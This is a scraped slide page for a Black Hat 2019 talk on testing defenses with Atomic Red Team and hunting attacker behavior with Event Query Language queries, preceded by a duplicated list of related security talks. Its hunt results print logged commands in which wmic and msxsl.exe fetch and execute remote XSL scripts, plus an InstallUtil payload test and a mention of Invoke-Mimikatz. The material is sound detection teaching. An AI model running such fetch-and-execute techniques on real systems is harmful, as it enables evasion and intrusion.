Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
Circle City Con 2019 and BSides SATX 2019
Abstract:
How do you find malicious activity? We often resort to the cliche, you know it when you see it, but how do you even see it, without drowning in data? MITRE’s ATT&CK knowledge base organizes adversary behavior into tactics and techniques, and orients our approach to endpoint data. It suggests questions that might be worth asking, but not a way to ask them. The Event Query Language (EQL) allows a security analyst to naturally express queries for IOC search, hunting, and behavioral detections, while remaining platform and data source agnostic.
In this talk, I will demonstrate the iterative process of establishing situational awareness in your environment, creating targeted detections, and hunting for the adversary in your environment with real data, queries, and results.
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
Brucon 2016
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us.
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
Circle City Con 2019 and BSides SATX 2019
Abstract:
How do you find malicious activity? We often resort to the cliche, you know it when you see it, but how do you even see it, without drowning in data? MITRE’s ATT&CK knowledge base organizes adversary behavior into tactics and techniques, and orients our approach to endpoint data. It suggests questions that might be worth asking, but not a way to ask them. The Event Query Language (EQL) allows a security analyst to naturally express queries for IOC search, hunting, and behavioral detections, while remaining platform and data source agnostic.
In this talk, I will demonstrate the iterative process of establishing situational awareness in your environment, creating targeted detections, and hunting for the adversary in your environment with real data, queries, and results.
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Chris Gates
Brucon 2016
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable process. It is extremely rare that a vulnerability causes a direct risk to an environment, it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that Internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the Defensive teams to measure the environments resistance to the attacks. We will demonstrate attacks, capabilities, TTP’s tracking, trending, positive metrics, hunt integration and most of all we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team. Sparring and training every day to be ready for the fight when it comes to us.
MITRE ATT&CK is quickly gaining traction and is becoming an important standard to use to assess the overall cyber security posture of an organization. Tools like ATT&CK Navigator facilitate corporate adoption and allow for a holistic overview on attack techniques and how the organization is preventing and detecting them. Furthermore, many vendors, technologies and open-source initiatives are aligning with ATT&CK. Join Erik Van Buggenhout in this presentation, where he will discuss how MITRE ATT&CK can be leveraged in the organization as part of your overall cyber security program, with a focus on adversary emulation.
Erik Van Buggenhout is the lead author of SANS SEC599 - Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses. Next to his activities at SANS, Erik is also a co-founder of NVISO, a European cyber security firm with offices in Brussels, Frankfurt and Munich.
Threat hunting - Every day is hunting seasonBen Boyd
Breakout Presentation by Ben Boyd during the 2018 Nebraska Cybersecurity Conference.
Introduction to Threat Hunting and helpful steps for building a Threat Hunting Program of any size, from small to massive.
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
How to set up a Threat Hunting Team for Active Defense utilizing Cyber Threat Intelligence and how CTI can help a company grow and improve its security posture.
My slides for PHDays 2018 Threat Hunting Hands-On Lab - https://www.phdays.com/en/program/reports/build-your-own-threat-hunting-based-on-open-source-tools/
Virtual Machines for lab are available here - https://yadi.sk/d/qB1PNBj_3ViWHe
Talk on Kaspersky lab's CoLaboratory: Industrial Cybersecurity Meetup #5 with @HeirhabarovT about several ATT&CK practical use cases.
Video (in Russian): https://www.youtube.com/watch?v=ulUF9Sw2T7s&t=3078
Many thanks to Teymur for great tech dive
Sharpening your Threat-Hunting Program with ATTACK FrameworkMITRE - ATT&CKcon
From MITRE ATT&CKcon Power Hour December 2020
By Hieu Tran, Threat Detection Team Lead FPT Cybersecurity Division
No matter how sophisticated and thorough your security precautions may be, you cannot assume your security measures are impenetrable. This is why you need a threat hunting program in place. But how can we implement a proper threat hunting program and run it efficiently? In this talk, we will uncover how to sharpen your threat hunting strategy by leveraging ATT&CK. Ultimately, we’ll be demonstrating how effectively employing the hunting methodology in the real-world battlefield, fighting against well-known cyber espionage actors who strongly focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia.
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE - ATT&CKcon
Red Canary’s applied research team built the Atomic Red Team project based on a simple idea: encourage security teams to test their systems.
Leveraging MITRE ATT&CK, the series of small tests can be combined into chains to help teams gain insight into gaps in their security program at all levels. This talk describes how to use Atomic Red Team and how MITRE ATT&CK is leveraged to write the tests.
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
BSides Las Vegas 2016 Talk: Powershell-fu: Hunting on the Endpoint. Presented the PSHunt framework (which will be released on Github) and methodology for hunting on the endpoint using Powershell across an enterprise or on an individual system.
Threat Hunting Procedures and Measurement MatriceVishal Kumar
This document will provide the basics of Cyber Threat Hunting and answers of some Q such as; What is Threat Hunting?, What is the Importance of Threat Hunting, and How it can be start....Bla..Bla..Bla...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
From ATT&CKcon 3.0
By Jonny Johnson, Red Canary and Olaf Hartong, FalconForce
As defenders, we often find ourselves wanting "more" data. But why? Will this new data provide a lot of value or is it for a very niche circumstance? How many attacks does it apply to? Are we leveraging previous data sources to their full capability? Within this talk, Olaf and Jonny will walk through different data sources they leverage more than most when analyzing data within environments, why they do, and what these data sources do and can provide in terms of value to a defender.
MITRE ATT&CK is quickly gaining traction and is becoming an important standard to use to assess the overall cyber security posture of an organization. Tools like ATT&CK Navigator facilitate corporate adoption and allow for a holistic overview on attack techniques and how the organization is preventing and detecting them. Furthermore, many vendors, technologies and open-source initiatives are aligning with ATT&CK. Join Erik Van Buggenhout in this presentation, where he will discuss how MITRE ATT&CK can be leveraged in the organization as part of your overall cyber security program, with a focus on adversary emulation.
Erik Van Buggenhout is the lead author of SANS SEC599 - Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses. Next to his activities at SANS, Erik is also a co-founder of NVISO, a European cyber security firm with offices in Brussels, Frankfurt and Munich.
Threat hunting - Every day is hunting seasonBen Boyd
Breakout Presentation by Ben Boyd during the 2018 Nebraska Cybersecurity Conference.
Introduction to Threat Hunting and helpful steps for building a Threat Hunting Program of any size, from small to massive.
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
How to set up a Threat Hunting Team for Active Defense utilizing Cyber Threat Intelligence and how CTI can help a company grow and improve its security posture.
My slides for PHDays 2018 Threat Hunting Hands-On Lab - https://www.phdays.com/en/program/reports/build-your-own-threat-hunting-based-on-open-source-tools/
Virtual Machines for lab are available here - https://yadi.sk/d/qB1PNBj_3ViWHe
Talk on Kaspersky lab's CoLaboratory: Industrial Cybersecurity Meetup #5 with @HeirhabarovT about several ATT&CK practical use cases.
Video (in Russian): https://www.youtube.com/watch?v=ulUF9Sw2T7s&t=3078
Many thanks to Teymur for great tech dive
Sharpening your Threat-Hunting Program with ATTACK FrameworkMITRE - ATT&CKcon
From MITRE ATT&CKcon Power Hour December 2020
By Hieu Tran, Threat Detection Team Lead FPT Cybersecurity Division
No matter how sophisticated and thorough your security precautions may be, you cannot assume your security measures are impenetrable. This is why you need a threat hunting program in place. But how can we implement a proper threat hunting program and run it efficiently? In this talk, we will uncover how to sharpen your threat hunting strategy by leveraging ATT&CK. Ultimately, we’ll be demonstrating how effectively employing the hunting methodology in the real-world battlefield, fighting against well-known cyber espionage actors who strongly focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia.
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca...MITRE - ATT&CKcon
Red Canary’s applied research team built the Atomic Red Team project based on a simple idea: encourage security teams to test their systems.
Leveraging MITRE ATT&CK, the series of small tests can be combined into chains to help teams gain insight into gaps in their security program at all levels. This talk describes how to use Atomic Red Team and how MITRE ATT&CK is leveraged to write the tests.
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
BSides Las Vegas 2016 Talk: Powershell-fu: Hunting on the Endpoint. Presented the PSHunt framework (which will be released on Github) and methodology for hunting on the endpoint using Powershell across an enterprise or on an individual system.
Threat Hunting Procedures and Measurement MatriceVishal Kumar
This document will provide the basics of Cyber Threat Hunting and answers of some Q such as; What is Threat Hunting?, What is the Importance of Threat Hunting, and How it can be start....Bla..Bla..Bla...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
From ATT&CKcon 3.0
By Jonny Johnson, Red Canary and Olaf Hartong, FalconForce
As defenders, we often find ourselves wanting "more" data. But why? Will this new data provide a lot of value or is it for a very niche circumstance? How many attacks does it apply to? Are we leveraging previous data sources to their full capability? Within this talk, Olaf and Jonny will walk through different data sources they leverage more than most when analyzing data within environments, why they do, and what these data sources do and can provide in terms of value to a defender.
Web application security and Python security best practicesPGS Software S.A.
Michał Wodyński, python developer w PGS Software opowiedział o najlepszych praktykach bezpieczeństwa na spotkaniu wroc.py w styczniu 2019 we Wrocławiu.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
In many targeted attack cases, once the attacker gains entry into the network, malware infection will spread laterally. In incident responses, investigating this lateral movement activity is very important. Methods for investigating lateral movement include log analysis of infected hosts and forensic analysis of disk images. However, in many cases, useful logs for incident investigation are not recorded in infected hosts, making it difficult to trace the attackers' behavior. This often results in not being able to get a clear picture of how the infection spreads across the network.
Therefore, we conducted investigation on attackers' C2 servers and malware to gain insight into their actives. By decoding the malware's communication logs and C2 server logs, we were able to understand the attackers’ activity after the network intrusion. We also found common patterns in how infection spread laterally. Also, even in different campaigns with different malware deployed, many common tools were used by attackers.
Taking advantage of the similarity, we figured that tracking these tools is effective in understanding lateral movements. In Windows PCs, which are the main target of APT attacks, certain
Unmasking Careto through Memory Forensics (video in description)Andrew Case
My presentation from SecTor 2014 on analyzing the sophisticated Careto malware with memory forensics & Volatility
Video here: http://2014.video.sector.ca/video/110388398
Automate threat detections and avoid false positivesElasticsearch
Detect threats and avoid the noise of false positives with the detection engine in Elastic Security. Automate threat detection via correlations and machine learning through real-world examples.
Automatisez la détection des menaces et évitez les faux positifsElasticsearch
En éliminant les angles morts, vous disposez à présent d'un contexte suffisant. Mais cela signifie-t-il pour autant que vous pouvez tirer des informations importantes quand vous en avez besoin ? Découvrez comment détecter les menaces, tout en évitant les faux positifs, avec le moteur de détection d'Elastic Security. Vous apprendrez à automatiser la détection des menaces en exploitant les corrélations et le Machine Learning à l'aide d'exemples réels.
PyCon AU 2012 - Debugging Live Python Web ApplicationsGraham Dumpleton
Monitoring tools record the result of what happened to your web application when a problem arises, but for some classes of problems, monitoring systems are only a starting point. Sometimes it is necessary to take more intrusive steps to plan for the unexpected by embedding mechanisms that will allow you to interact with a live deployed web application and extract even more detailed information.
Automate threat detections and avoid false positivesElasticsearch
Eliminating blind spots means you now have enough context. But can you get important insights from that context when you need it? Learn how to detect threats — while avoiding the noise of false positives — with the detection engine in Elastic Security. You’ll see how to automate threat detection via correlations and machine learning, with real-world examples of each.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
Automatiza las detecciones de amenazas y evita falsos positivosImma Valls Bernaus
Eliminar los puntos ciegos significa que tienes suficiente contexto. ¿Pero, puedes obtener información importante de ese contexto cuándo lo necesitas? Aprende a detectar amenazas mientras evitas el ruido de falsos positivos, con el motor de detección de Elastic Security. Verás cómo automatizar la detección de amenazas mediante correlaciones y Machine Learning, con ejemplos reales de cada uno.
Automatiza las detecciones de amenazas y evita falsos positivosImma Valls Bernaus
Eliminar los puntos ciegos significa que tienes suficiente contexto. ¿Pero, puedes obtener información importante de ese contexto cuándo lo necesitas? Aprende a detectar amenazas mientras evitas el ruido de falsos positivos, con el motor de detección de Elastic Security. Verás cómo automatizar la detección de amenazas mediante correlaciones y Machine Learning, con ejemplos reales de cada uno.
In this PowerPoint, learn how a security policy can be your first line of defense. Servers running AIX and other operating systems are frequent targets of cyberattacks, according to the Data Breach Investigations Report. From DoS attacks to malware, attackers have a variety of strategies at their disposal. Having a security policy in place makes it easier to ensure you have appropriate controls in place to protect mission-critical data.
Automatize a detecção de ameaças e evite falsos positivosElasticsearch
Detecte ameaças e evite falsos positivos com o mecanismo de detecção no Elastic Security. Automatize a detecção de ameaças por meio de correlações e machine learning com exemplos do reais.
.Today, criminals are using novel tecnhiques to bypass AV detecions. Manual debugging must be used to unpack malware (a hard work that is needed to reveal the original malware code). Dissecting malware allows us to understand criminals’ modus operandi, and manual analysis is always required to reveal FUD malware.
Automatiza las detecciones de amenazas y evita los falsos positivosElasticsearch
Eliminar los puntos ciegos significa que tienes suficiente contexto. ¿Pero puedes obtener información importante de ese contexto cuando lo necesitas? Aprende a detectar amenazas, mientras evitas el ruido de falsos positivos, con el motor de detección de Elastic Security. Verás cómo automatizar la detección de amenazas mediante correlaciones y Machine Learning, con ejemplos reales de cada uno.
Similar to Fantastic Red Team Attacks and How to Find Them (20)
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
3. qwinsta /server:bh-19
Casey Smith
Director of Applied Research @ Red Canary
Project Developer Atomic Red Team
I love testing defenses
Mostly Gryffindor
Ross Wolf
Senior Threat Researcher @ Endgame
Created the Event Query Language
Detector of attacker tradecraft
Likely a Ravenclaw
@rw_access@subTee
4. Agenda
● How to test with Atomic Red Team
○ Frequently missed attacks
○ How do we test security tools?
● How to hunt with Event Query Language (EQL)
○ Introduction to behavioral detection
○ Crash course with examples
● Red vs Blue
○ Exercise using EQL to finding unknown threats
○ Investigate a sample data set
○ Uncover a new attacker technique
● Conclusions
bit.ly/fantastic19
6. Many defenders do not know
HOW to start testing, or they are
not testing well.
This was the reason we created
Atomic Red Team.
7. What is Atomic Red Team?
● Open source project for testing for security controls
● YAML described tests mapped to MITRE ATT&CK™
● Simple easy tests—many can be run in a single command line
● Demystify attacks by providing code and examples
● DOES NOT replace human red team, adversary emulation, adaptation.
atomicredteam.io
8. Example Atomic Technique YAML
attack_technique: T1118
display_name: InstallUtil
atomic_tests:
- name: InstallUtil GetHelp method call
supported_platforms:
- windows
input_arguments:
filename:
description: location of the payload
type: Path
default: C:AtomicRedTeamatomicsT1118srcT1118.dll
executor:
name: command_prompt
command: |
C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /? #{filename}
9. Easy to Automate, Chain Tests Together.
Tests are benign and can be fully customized as needed.
10. Observations with Atomic Red Team
● Validate telemetry collection & detection logic
● Understanding your data and visibility
● Knowledge of the environment
● Detections for common techniques
11. Frequently Missed MITRE ATT&CK Techniques
● T1036 Masquerading
● T1047 Windows Management Instrumentation
● T1055 Process Injection
● T1118 InstallUtil
● T1127 Trusted Developer Tools
● T1170 MSHTA
● T1220 XSL Script Processing
Often leverage built-in native OS tools
12. Prepare For Actual Incidents
InstallUtil (MITRE ATT&CK T1118)
https://securelist.com/using-legitimate-tools-to-hide-malicious-code/83074/
MSBuild (MITRE ATT&CK T1127)
https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
13. Atomic Red Team May Help
Organizations Prepare
By introducing small, benign examples to test and practice
response/coverage/hunting.
15. Behaviors occur over time
and we need to monitor
where the action happens.
We can get answers to
behavioral questions with the
Event Query Language.
16. Event Query Language
● Simple syntax designed for hunting and detection
● Supports contextual and complex behaviors
● Tracks lineage and event sequences statefully
● Filter, stack and sift through data with pipes
● Dynamic shell for querying data
eql.readthedocs.io
17. Event Queries
● <event type> where <condition>
● and or not < <= == != >= >
● Wildcard with asterisk *
● Case-insensitive comparisons
process where
process_name == "svchost.exe" and
not (command_line == "* -k *" or
parent_process_name == "services.exe")
18. Sequences
● Match multiple events in order
● Shared properties with by syntax
● Timeouts with maxspan=5m
● Statefully expire sequences with
until condition
sequence with maxspan=<time>
[ <event_type> where <condition>] by <A>, <B>, <C>
[ <event_type> where <condition>] by <D>, <E>, <F>
19. Sequences
● Match multiple events in order
● Shared properties with by syntax
● Timeouts with maxspan=5m
● Statefully expire sequences with
until condition
sequence with maxspan=5m
[ file where file_name == "*.exe"
and user_name != "SYSTEM"] by file_path
[ process where user_name == "SYSTEM"] by process_path
20. Join
● Multiple events without ordering
● No time limitations
● Allows by and until syntax
join
[<event_type> where <condition>]
[<event_type> where <condition>]
21. Join
● Multiple events without ordering
● No time limitations
● Allows by and until syntax
join
[file where file_path == "*System32Tasksh4x0r.xml"]
[registry where registry_path == "*runonceh4xor"]
22. Join
● Multiple events without ordering
● No time limitations
● Allows by and until syntax
join by source_ip, destination_ip
[network where destination_port == 3389] // RDP
[network where destination_port == 135] // RPC
[network where destination_port == 445] // SMB
23. Data Pipes
● Perform data stacking while hunting
● Process results by filtering, counting and removing duplicates
count filter head
sort tail unique
unique_count
process where user_name != "SYSTEM"
| unique process_name, user_name
| unique_count process_name
| filter count == 1
24. Process Lineage
● Natively tracks lineage by monitoring process create and terminate
● Supports descendant of, child of, and event of relationships
● Combine or nest with other logic
network where process_name == "powershell.exe"
and descendant of
[process where
process_name in ("outlook.exe",
"winword.exe",
"powerpnt.exe",
"excel.exe")]
27. Setting the Stage
● Windows endpoint with Sysmon installed
● Real background noise
● Data exported to json.gz file
Gols
Blue Team Objective:
Find the red team and scope the compromise
Red Team Objective:
Target a developer system with a unique attack
28. Investigative Process
● Gather an initial set of suspicious activity
○ Alerting from existing detectors
○ Hunting for evidence of compromise
● Reduce the data set until it’s manageable
● Triage results to determine good or bad
● Scope the compromise by pulling on threads
30. Guiding Questions
● What persistence locations are new?
● Are there unusual process relationships?
● Were there attempts to blend in?
● Did anything start behaving differently?
○ First seen network connection for a process
○ First lateral movement attempt for a user
Think situational awareness + ATT&CK tactics
31. mutatio corporis
Were any native tools renamed and executed?
process where subtype.create and original_file_name != process_name
and original_file_name in (
"cmd.exe", "certutil.exe",
"cscript.exe", "dsquery.exe",
"installutil.exe", "powershell.exe",
"rundll32.exe", "wscript.exe",
)
| unique original_file_name, file_name
0 results found
32. lolbas revello
What callbacks were established from binaries used to live off the land?
sequence by unique_pid
[process where subtype.create and process_name in (
"Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "Certutil.exe",
"Cmdkey.exe", "Cmstp.exe", "Control.exe", "Csc.exe",
"Cscript.exe", "Dfsvc.exe", "Diskshadow.exe", "Dnscmd.exe",
"Esentutl.exe", "Extexport.exe", "Extrac32.exe", "Expand.exe",
// 61 binaries from https://github.com/api0cradle/LOLBAS/blob/master/LOLBins.md
)]
[network where subtype.outgoing]
| unique events[0].command_line
8 results found
34. Please, you don’t understand... Nothing in there is dangerous.
Triage Results
35. Guiding Questions
● Is the path unexpected?
● Do file names look like Windows binaries?
● Was the PE image signed?
● Is it a legitimate product?
● Has this been publically reported?
42. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process where subtype.create and descendant of [
network where event of [
process where subtype.create and
parent_process_name == "explorer.exe" and
process_name == "powershell.exe"
]
]
43 results found
46. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process_name command_line
cmd.exe "C:Windowssystem32cmd.exe" /c
cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:list"
WMIC.exe wmic.exe process /FORMAT:list
cmd.exe "C:Windowssystem32cmd.exe" /c
cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process
/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics
cript.xsl"
WMIC.exe wmic.exe process
/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics
cript.xsl
cmd.exe "C:Windowssystem32cmd.exe" /c
cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe
C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml
C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl"
Showing results 21-28 of 43
47. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process_name command_line
msxsl.exe C:WindowsTempmsxsl.exe C:AtomicRedTeamatomicsT1220srcmsxslxmlfile.xml
C:AtomicRedTeamatomicsT1220srcmsxslscript.xsl
calc.exe "C:WindowsSystem32calc.exe"
cmd.exe "C:Windowssystem32cmd.exe" /c
cmd.exe "C:Windowssystem32cmd.exe" /c "C:WindowsTempmsxsl.exe
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"
msxsl.exe C:WindowsTempmsxsl.exe
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
calc.exe "C:WindowsSystem32calc.exe"
cmd.exe "C:Windowssystem32cmd.exe" /c
Showing results 29-35 of 43
48. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process_name command_line
cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process /FORMAT:list"
WMIC.exe wmic.exe process /FORMAT:list
cmd.exe "C:Windowssystem32cmd.exe" /c
cmd.exe "C:Windowssystem32cmd.exe" /c "wmic.exe process
/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics
cript.xsl"
WMIC.exe wmic.exe process
/FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmics
cript.xsl
cmd.exe "C:Windowssystem32cmd.exe" /c
WMIC.exe "C:WindowsSystem32WbemWMIC.exe" os get /format:wmicscript
WMIC.exe "C:WindowsSystem32WbemWMIC.exe" os get /format:wmicscript.xsl
Showing results 36-43 of 43
50. claves revelare
What loaded the PowerShell module Invoke-Mimikatz?
sequence
[process where subtype.create] by unique_pid
[process where subtype.create and
command_line == "*Invoke-Mimikatz*"] by unique_ppid
1 result found
53. lolbas revello
event_type parent_process_name process_name command_line destination
process explorer.exe InstallUtil.exe
"C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe" /?
C:UsersNEWTSC~1AppDataLocalTemp
a3541d3f-a4db-c8b0-dab7-c268095df70e.chm
network InstallUtil.exe 10.10.10.10
✘ Red
Team
54. distincta imperium
What unique PowerShell commands were seen?
